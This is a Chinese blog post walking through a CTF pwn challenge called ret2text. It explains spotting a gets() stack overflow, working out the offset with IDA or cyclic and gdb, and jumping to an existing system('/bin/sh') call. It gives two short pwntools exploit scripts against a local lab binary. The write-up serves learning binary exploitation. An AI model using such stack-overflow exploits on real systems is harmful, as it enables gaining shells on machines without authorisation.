2019.7.19 dev c++调试与ret2text详解

最新推荐文章于 2024-07-11 23:50:59 发布
最新推荐文章于 2024-07-11 23:50:59 发布
阅读量405 收藏 1
点赞数 1
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DSR446/article/details/96467496
版权

30/100 发布文章 1.dev c++如何调试:请参考以下链接
①https://jingyan.baidu.com/article/f54ae2fc4b680b1e92b84930.html
②https://www.jianshu.com/p/1602264dadf2
2.ret2text详解:法1:

esp+1ch:意思是S到栈顶的距离是1ch,ebp-64h:意思是S到栈顶的距离是64h。
在这里插入图片描述
一般的出现gets(&s)就可以等价于出现栈溢出,出现printf家族且没有限制其输出就伴随着格式化字符串漏洞,例如:printf(&a)。
在这里插入图片描述
通过搜索字符串可以发现反汇编程序的源码中有system(’/bin/sh’),我们可以将其地址覆盖返回地址。需要填充的是s的栈空间加ebp所占的空间:64h+4。但此题有点特殊用IDA静态调试得不到shell,我们需要用动态调试。我的上一篇博客有gdb动态调试的资料。
在这里插入图片描述
⑤一下是exp

# -*- coding:utf-8 -*-
from pwn import *
p = process("./ret2text")
payload= 'a'*(0x6c+4)+p32(0x0804863A) #将返回地址转化
p.recvline()
p.sendline(payload)
p.interactive()

⑥法二:
详解参考:https://blog.csdn.net/sanorintea/article/details/82288959
⑦主要思想是在程序外面通过cyclic ***生成一段有序数,通过gdb运行程序,把这段有序数复制粘贴过去。因为我们的程序不能跳转到我们覆盖的返回地址的新返回地址。程序就会在此处报错,并将新的返回地址提示出来。这里新的返回地址使我们复制的有序数,它是字符转化为ASCII然后转化为十六进制存储在栈里,所以我们需要将这个地址转化为ASCII值,然后在程序外面运行
cyclic -l 0x62616164 ,其结果就是我们要填充的。
在这里插入图片描述
⑨本人觉得如果不出现这个新地址,可以再手动输入很多字符来实现栈溢出,因为cyclic生成的有序字符其对应的十六进制数可能有对应的地址和其对应。
⑩这里的112是s和ebp的总和,所以这里就不需要再另外加ebp了。
⑪其exp为:

 # -*- coding:utf-8 -*-
    from pwn import *
    p = process("./ret2text")
    payload= 'a'*(112)+p32(0x0804863A) #将返回地址转化
    p.recvline()
    p.sendline(payload)
    p.interactive()
藏蓝色的达达
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dev-c++软件
02-18
dev-c++软件安装包,有需要的可以自行下载
pwn笔记 - ret2text - 函数传参(x86&x64
weixin_44227244的博客
09-06 3291
pwn笔记 - ret2text - 函数传参
Dev C++调试程序方法详解
qq_41854911的博客
12-04 3万+
分享一篇站长的关于调试的文章:Dev C++调试程序方法详解 Dev C++算是兼容性很好使用很方便的IDE了,记录一下调试方法,以备不时之需。 所谓调试程序,就是控制编译器一行一行地执行代码,过程中可以清楚看到每个变量值的变化情况、函数的调用过程等,进而发现程序中隐藏的错误或者低效的代码。 作为一款免费、开源的 C/C++ IDE,Dev C++ 内嵌 GCC 编译器和 GDB 调试器,既能编译、运行程序,也能调试程序。本节,我们以一段完整的 C 语言程序为例,系统地学一下如何用 Dev C++ 调试程序
ret2text
最新发布
m0_62280492的博客
07-11 788
x86和x64下常见的ret2text
C++中如何进行txt文件的读入和写入
热门推荐
hzw9806的博客
06-01 9万+
大家可能大部分写代码都是在devc或者 vs里面直接输入数据,这一般常见于简单算法和数据的处理,但是一旦处理大数据的话,几百万,几千万,上亿个数据手打似乎不能轻易实现的,那么这篇文章我们来搞懂C++环境下如何进行io流读取txt文件,其实我们需要一个简单的代码进行分析。这里直接给出源码, 可以进行直接编译#include <fstream> #include <iostream&...
Dev-C++的下载和安装教程(非常详细)从零基础入门到精通,看完这一篇就够了
Javachichi的博客
06-27 7万+
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
pwn小白入门03---ret2text
weixin_45943522的博客
02-21 6347
什么是栈溢出: 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(比如gets函数,他不会去验证你输入的值的长度,通过这个函数,你可以往一个本身大小为4字节的数组中填入任意大小的数据,如果填入8字节的数据,将会导致栈溢出,进而程序报错)。就像是往杯子里倒水,水满了溢出来最后烫到你一样。 最简单的栈溢出利用:ret2text 通过栈溢出修改call指令保存在栈上的返回地址(eip的值),这样cpu执行ret指令的时候,就会将被修改的值从栈上取
ret2text涉及到的堆栈平衡问题
qq_41560595的博客
01-04 4546
这个指令要求rsp+0x40的值是16字节对齐。 错误的题解: from pwn import * io=process("./level0") raw_input() elf=ELF("./level0") system_addr=0x400596 io.recvuntil(b"World\n") payload=b"A"*(0x88)+p64(system_addr) io.send(payload) io.interactive() $rsp+0x40没有16字节对齐。 正确的题解: fro.
pwn学习day4——ret2text
qq_44657899的博客
06-29 435
覆盖函数返回地址到程序内存在的gadgets获取shell。找到hint函数地址就可以解出题目了,但是打死都不行。gdb断点至scanf函数处,也没看出来哪里出现了问题。32位这里遇到个问题,按理来说覆盖长度为。直接溢出至hint函数处即可。问大佬说是因为需要绕过ecx。
CTF学习笔记——ret2text
weixin_66578482的博客
12-10 370
ret2text 应该算是PWN里面比较简单的题型了,这种题型有个显著特征,就是会有个很明显的后门函数,也就是,我们只需要将我们的程序跳转到后门函数即可。不过我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。不过程序也可能会开启某些保护,我们需要想办法去绕过这些保护,这些我们就到后面来介绍。
Dev和vs2019优缺点
qq_62493848的博客
10-06 3336
Dev和vs的对比 个人觉得Dev比较好,Dev速度快创建快c和c++可以同时创建,速度是真快。 缺点:没有词组提示 vs2019好处: 开发基本都有 缺点:慢死了dev15秒vs2分钟,配置不好建议不要用了,main有一个,第二个源文件就不能出现了。 ...
DevC++6.0 C/C++开发工具
05-15
短小精悍的C/C++开发工具,非常适合初学者。
Dev-C++ 5.11最新版本
07-18
Dev-C++ 5.11是目前Dev-C++的最新版本,非常适合学习C++
DEV C++安装包
12-27
Dev-C++是一个Windows环境下的一个适合于初学者使用的轻量级 C/C++ 集成开发环境(IDE)。它是一款自由软件,遵守GPL许可协议分发源代码。它集合了MinGW中的GCC编译器、GDB调试器和 AStyle格式整理器等众多自由软件。原开发公司 Bloodshed 在开发完 4.9.9.2 后停止开发,所以现在由 Orwell 公司继续更新开发,最新版本:5.11。
C++调试详解
10-25
这是介绍C++调试方法的技术文档,讲的很全面深刻,与大家共享
好好说话之ret2text
hollk’s blog
06-22 2043
本题为bamboofox-ret2text 题目路径: /ctf-challenges/pwn/stackoverflow/ret2text/bamboofox-ret2text 一、原理 ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadget...
和ZLTT一起学pwn 2.ret2text
qq_53610850的博客
10-27 699
2.ret2text 前置知识 基础栈溢出 攻击思路 在上一篇中,我们学习了最基础的栈溢出攻击方式。事实上,也是最基础的ret2text攻击 对elf文件结构较熟悉的人应该发现了,text就是代码段的段名,所谓ret2text,就是向程序中已有的代码段跳转,当然,通常不会有那么简单的利用条件,在调用很多函数的时候,还需要伪造参数 在这种状态下,除了需要覆盖返回地址,还需要在栈上伪造压入的参数 利用溢出在栈上伪造一个函数的传参,再劫持跳转到函数即可带参调用 攻击示例 使用如下程序作为示例程序(这个程序有更简单
PWN做题笔记1-ret2text(已校对)
qq_40923256的博客
04-19 3230
原题位置:CTFHub 题目属于栈溢出 给出了地址和端口,压缩包中有一个二进制程序pwn file pwn可以看到是64位ELF程序 checksec发现没有开启地址空间随机化机制 程序运行如下: ida64反汇编,发现输入没有边界检查,存在注入 secure函数调用了system返回一个服务器里的shell,因此目标是调用这个函数 函数地址如下: main函数栈结构如下: 目标是覆盖掉ebp,地址偏移为0x70+8,这部分覆盖为“A”,之后ebp覆...
cv2.imwrite如何逐帧保存 C++
03-31
要逐帧保存视频,可以使用OpenCV中的VideoCapture和VideoWriter类。以下是保存视频的示例代码: ``` import cv2 # 打开视频文件 cap = cv2.VideoCapture('video.mp4') # 获取视频帧率和大小 fps = int(cap.get(cv2.CAP_PROP_FPS)) width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)) height = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)) # 创建VideoWriter对象 fourcc = cv2.VideoWriter_fourcc(*'mp4v') out = cv2.VideoWriter('output.mp4', fourcc, fps, (width, height)) # 逐帧读取视频并保存 while True: ret, frame = cap.read() if not ret: break out.write(frame) # 保存每一帧为图像 cv2.imwrite('frame%d.jpg' % cap.get(cv2.CAP_PROP_POS_FRAMES), frame) # 释放资源 cap.release() out.release() ``` 在上面的代码中,我们使用VideoCapture类打开视频文件,并使用VideoWriter类创建输出视频文件。然后,我们逐帧读取视频并将每一帧写入输出文件,同时使用cv2.imwrite()函数将每一帧保存为图像。最后,我们释放资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值